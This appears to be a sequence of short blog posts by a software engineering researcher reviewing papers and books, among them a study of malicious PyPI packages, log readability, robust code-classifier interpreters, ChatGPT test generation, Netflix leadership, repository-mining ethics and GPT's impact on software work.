I often use python because of the large ecosystem of libraries. Thanks to these libraries, I do not have to focus on the details of the implementation, but I can focus on the task at hand. However, not all libraries are good, and therefore this paper captured my attention. The study aims to understand the characteristics and lifecycle of malicious code in PyPI by building an automated data collection framework and analyzing a dataset of malicious package files.
Key findings and contributions of the paper include:
Empirical Analysis: The authors conducted an empirical study to understand the characteristics and lifecycle of malicious code in the PyPI ecosystem.
Automated Data Collection: They built an automated data collection framework to gather a high-quality dataset of malicious code from PyPI mirrors and other sources.
Dataset Construction: The dataset includes 4,669 malicious package files, making it one of the largest publicly available datasets of PyPI malicious packages.
Classification Framework: An automated classification framework was developed to categorize the collected malicious code into different types based on their behavior characteristics.
Malicious Behavior: The research found that over 50% of the malicious code exhibits multiple malicious behaviors, with information stealing and command execution being particularly prevalent.
Novel Attack Vectors and Anti-Detection Techniques: The study observed several novel attack vectors and anti-detection techniques used by malicious code.
Impact on End-User Projects: It was revealed that 74.81% of all malicious packages successfully entered end-user projects through source code installation, increasing security risks.
Persistence in Mirror Servers: Many reported malicious packages persist in PyPI mirror servers globally, with over 72% remaining for an extended period after being discovered.
Lifecycle Portrait: The paper sketches a portrait of the malicious code lifecycle in the PyPI ecosystem, reflecting the characteristics of malicious code at different stages.
Suggested Mitigations: The authors present some suggested mitigations to improve the security of the Python open-source ecosystem.
The study is significant as it provides a systematic understanding of the propagation patterns, influencing factors, and potential hazards of malicious code in the PyPI ecosystem. It also offers a foundation for developing more efficient detection methods and improving the security practices within the software supply chain.
Debugging and testing often require analyses of log files. This means that we need to read a lot of lines of information that can be useful, but at the same time it is difficult to parse it. Therefore, this paper is of interest for those who must read these files once in a while.
This paper investigates the readability of log messages in software logging. The authors conducted a comprehensive study involving interviews with industrial practitioners, manual investigation of log messages in open-source systems, online surveys, and the exploration of automatic classification of log message readability using machine learning.
Key findings and contributions of the paper include:
Practitioners’ Expectations (RQ1): Through interviews, the authors identified three aspects related to log message readability: Structure, Information, and Wording. They also derived specific practices to improve each aspect. Survey participants acknowledged the importance of these aspects, with Information being considered the most critical.
Readability in Open Source Systems (RQ2): A manual investigation of log messages from nine large-scale open-source systems revealed that 38.1% of log messages have inadequate readability, particularly in the aspect of Information.
Automatic Classification (RQ3): The study explored the use of deep learning and machine learning models to automatically classify the readability of log messages. The models achieved a balanced accuracy above 80% on average, indicating their effectiveness.
The paper’s contributions are significant as it is one of the first studies to investigate log message readability through interviews with industrial practitioners. It highlights the prevalence of inadequate readability in log messages within large-scale open-source systems and demonstrates the potential of machine learning models to classify log message readability automatically.
The study provides systematic comprehension of log message readability and offers empirically-derived guidelines to improve developers’ logging practices. It also opens avenues for future research to establish standards for composing log messages.
The authors conclude that their study sheds light on the importance of log message readability and provides a foundation for future work to improve logging practices in software development.
I’ve used language models for a while now. They are capable of many tasks, but one of their main problem is the robustness of the results. The models can produce very different results if we change only a minor detail.
This paper addresses the challenge of interpretability in deep learning models used for source code classification tasks such as functionality classification, authorship attribution, and vulnerability detection. The authors propose a novel method called Robin, which aims to create robust interpreters for deep learning-based code classifiers.
Key points from the paper include:
Problem with Current Interpretability: The authors note that existing methods for interpreting deep learning models are not robust and struggle with out-of-distribution examples. This is a significant issue because practitioners need to trust the model’s predictions, especially in high-security scenarios.
Robin’s Approach: Robin introduces a hybrid structure that combines an interpreter with two approximators. This structure leverages adversarial training and data augmentation to improve the robustness and fidelity of interpretations.
Experimental Results: The paper reports that Robin achieves on average a 6.11% higher fidelity when evaluated on the classifier, 67.22% higher fidelity when evaluated on the approximator, and 15.87 times higher robustness compared to existing interpreters. Additionally, Robin is less affected by out-of-distribution examples.
Contributions: The paper’s contributions are threefold: addressing the out-of-distribution problem, improving interpretation robustness, and empirically evaluating Robin’s effectiveness compared to known post-hoc methods.
Motivating Instance: The authors provide a specific instance of code classification to illustrate the problem inherent to the local interpretation approach, demonstrating the need for a robust interpreter like Robin.
Design of Robin: The paper details the design of Robin, which includes generating perturbed examples, leveraging adversarial training, and using mixup to augment the training set.
Source Code Availability: The source code for Robin has been made publicly available, which can facilitate further research and application by other practitioners.
Paper Organization: The paper is structured to present a motivating instance, describe the design of Robin, present experiments and results, discuss limitations, review related work, and conclude the study.
The authors conclude that Robin is a significant step forward in producing interpretable and robust deep learning models for code classification, which is crucial for their adoption in real-world applications, particularly those requiring high security.
Generating test cases is one of the new areas where ChatGPT is gaining traction. It is a good thing as it allows software developers to quickly raise quality of their software.
This paper discusses the problem and challenges in finding failure-inducing test cases, the potential of using LLMs for software engineering tasks, and the limitations of ChatGPT in this context. It also provides insights into how the task of finding a failure-inducing test case can be facilitated if the program’s intention is known, and how ChatGPT’s weakness at recognizing nuances can be leveraged to infer a program’s intention.
The authors propose Differential Prompting as a new paradigm for finding failure-inducing test cases, which involves program intention inference, program generation, and differential testing. The evaluation of this technique on QuixBugs and Codeforces demonstrates its effectiveness, notably outperforming state-of-the-art baselines.
The contributions of the paper include the original study of ChatGPT’s effectiveness in finding failure-inducing test cases, the proposal of the Differential Prompting technique, and the evaluation of this technique on standard benchmarks.
The paper also acknowledges that Differential Prompting works best for simple programs and discusses its potential benefits in software engineering education. Preliminaries and methodology are provided to illustrate the task of finding failure-inducing test cases and the workflow of Differential Prompting.
The authors conclude with the promising application scenarios of Differential Prompting, suggesting that while it is currently best for simple programs, it is a step towards finding failure-inducing test cases for larger software. They also highlight its benefits for software engineering education.
Today I had the possibility to read a book a bit outside of what I do today. I used to read a lot of leadership books when I gave my old course in Start-ups. Well, enough of the history. So, I’ve read the book, and it was really nice.
It is a book about modern leadership style from Netflix. It’s written from a perspective of the manager of Netflix (Reed Hastings), but it is commented by a business school professor Erin Mayer (https://erinmeyer.com). It’s a very interesting reading as it provides an account of how leadership of Netflix has evolved over time to what it is today.
Empowerment and flat leadership structure are at the core of this style, but they evolved continuously over years. Candor was the first new leadership style that was introduced and it’s something that all organizations would use. Even universities.
A lot of software engineering research studies use open source data and mine software repositories. It’s a common practice since it allows to test our hypotheses before asking for previous resources from our collaborating companies. By mining open source data we can also learn whether our study makes sense; we can see it as a pilot study of some sorts.
Mining software repositories has evolved into a popular activity since we got access to repositories like Github. There are even guidelines for assessing this kind of studies, e.g., https://sigsoft.org/EmpiricalStandards/docs/ and we have regulations of what we can do with the open source data – these can be in the form of a license, law (like GDPR or the CCPA) or the need for asking an ethical board for an approval. However, there is also a common sense – not everything that is legal is appropriate or ethical. We always need to ensure that no individual can be a subject to any harm as a result of our actions.
In the article that I want to bring up today, the authors discuss the ethical frameworks for ethical software engineering studies based on open source repositories. We need to make sure that:
We respect the persons, which stresses the need for approval and consent.
Beneficence, which means that we need to minimize the harm, but maximize the benefit.
Justice, which means that we need to consider each individual equally.
Respect for law and public interest, which entails conducting due diligence on which data we can use and in which way.
The most interesting part of this article is the analysis of different cases of mining software repositories. For example, the case of analyzing the code, reviews, commit messages and other types of data in the repositories.
I recommend this article for everyone who considers working with mining software repositories.
GPT technology, exemplified by the Github Copilot and its likes, changes software engineering to the ground. There is no doubt that the technology places a new tool in our engineering shed. It allows us to create software with a completely different set-up than what we are used to.
Now, what it really changes is only a few things, but these are very big ones.
Programmers —> designers and architects. GPT can write source code like no other tool on the market. And it only gets better at this. A quick glimpse at the Github Next website gives us a good understanding that this team has only got started. This changes everything we know about engineering software. Bad programmers will disappear over time. Good software designers, architects and software engineers will take their place. They will be fewer in number, but better in quality.
Software development —> software engineering. Designers will no longer get stuck in solving a small bit of a puzzle. GPT will do it for them. Instead of thinking how to write a test case, the designers will think how to test the software in the best possible way. They will focus on the engineering part of the software engineering. Something that I’m teaching my students from day one.
Consultancy —> knowledge hubs. Since programming will become easier and more approachable, we will need people who know how to solve a problem, not how to write a program. This big chunk of business of the consultancy companies will disappear. The consultancy companies will specialize in their domains and in problem-solving.
There will also be other things that will happen. Requirements will not be the same as they are. Testing will be different, architecting will be smarter and management more optimal. Knowledge will be more valued and critical thinking will be needed even more.
Well, this is my end of the academic year blog post. More to come after the summer. Stay safe!
I’ve read this book recently as the title and the authors caught my attention. Can you really write notes from the apocalypse? Well, turns out that the authors of this book made a very interesting twist to it.
This book is about people who prepare for the apocalypse. It takes us to a number of places where we meet people who prepare for the worse. For me, the most interesting was a guy who bought an old army bunker and prepared a reasonably priced ranch for survining after a nuclear war. Well, reasonably is still 35,000 dollars, but given that you get to live through the worse, maybe it’s not that expensive.
However, it was not the price that caught my eye. It was essentially how he marketed that shelter. The shelter itself was quite spartan, as opposed to shelter for the ultra-rich people with pools, game rooms, cinemas and what have you.
The main selling point for the shelter was not the spartan condition, it was the dream and the possibility of survival. The owner was selling people on the idea that they will be the ones to create the brave new world after the old one collapses.
I’m not certain that there would be world after the nuclear apocalypse (Chernobyl’s disaster happen 30 years ago and the area will be inhabitable for the next 200 years), but I did like the way he sold the “condos” in the shelter. Quite brilliant, actually.
AI is here to stay. We know that. It will only grow in its influence. We know that too. Especially after the release of ChatGPT we know that.
This book looks into different scenarios of co-existence between humans and AI. This is a novel view on the topic, which differentiates this book from the other of this kind. The previous view was either about some sort of doomsday theories how AI takes over the world. Well, there was also a view that AI will never really hit it off, because of the lack of conciousness and a human soul.
This book starts by looking at the historical development of humanity when a new technology was invented. First we have some limitations, which stop us from mass-using this technology. Then, we improve it and start using it a lot, which creates jobs and new markets. Then we automate it so that it can scale fast, which causes mass loss of jobs related to it.
Imagine banking – first, it was manual, which was cumbersome and error prone. Then came calculating machines, which required an army of operators who inputted simple instructions and got results. Then computers came and finally the Internet. Banks are still there, as institutions, but the job of a banker is not the same as 100 years ago. Well, it’s not really the same as 20 years ago; somewhat similar to 10 years ago, but not really.
The same goes with AI and therefore we need to lear how to co-exist with it. We can control it, or we can adjust to it or we can co-develop it and take advantage of it.
I strongly recommend this book as a reading about how to tackle the developments in AI, but more realistically, not doomsday profecy-style.
Interestingly, this is a paper from colleagues of ours from the department. The paper presents how one company – Ericsson – works with continuous deployment of their large software system in 3G RAN (Radio Access Networks). The highlights from the article are as follows:
New software field testing and validation activities become continuous.
Software deployment should be orchestrated between the constituent system.
A pilot customer to partner with is key for success.
Companywide awareness and top management support are important.
Documentation and active monitoring are critical for continuous deployment.
I like this paper because it presents a practical approach and a good set of practices that can be taken up by other companies.